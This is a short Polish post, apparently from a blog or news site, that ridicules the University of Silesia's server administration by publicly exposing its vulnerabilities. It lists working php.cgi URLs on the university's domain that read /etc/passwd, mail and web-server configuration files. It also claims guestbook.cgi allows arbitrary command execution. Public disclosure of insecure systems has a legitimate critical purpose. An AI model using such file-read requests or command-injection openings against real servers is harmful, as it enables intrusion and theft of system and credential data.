Pora dokształcić administratorów

Polskie uczelnie nie od dziś były narażone na ataki hackerów, zarówno ze strony niezadowolonych studentów jak i zaawansowanych programistów chętnie penetrujących serwery uczelniane. Jednak administrator serwerów z Uniwersytetu Śląskiego przechodzi samego siebie.

Po kilku lekcjach ze strony polskich hackerów dalej nic się nie zmieniło:

http://www.us.edu.pl/cgi-bin/php.cgi

http://www.us.edu.pl/cgi-bin/guestbook.cgi
Dla niewtajemniczonych tak skonfigurowany php.cgi daje możlowość przeglądania plików na serwerze:

http://www.us.edu.pl/cgi-bin/php.cgi?/etc/passwd

http://www.us.edu.pl/cgi-bin/php.cgi?/etc/postfix/main.cf

http://www.us.edu.pl/cgi-bin/php.cgi?/usr/local/apache/conf/httpd.conf
Guestbook.cgi podatny jest na możliwość wykonania dowolnego polecania na serwerze z uprawnieniami serwera WWW. Łącząć te dwie rzeczy oraz posiadając informacje że system SunOS posiada sporą ilość dziur mamy duże pole do popisu.

Nasuwa się tylko jedno pytanie… Czy aby administratorzy takich uczelnianych serwerów niepowinni zacząć pobierać lekcje u studentów?

Podziękowania dla joeman’a za podesłanie informacji.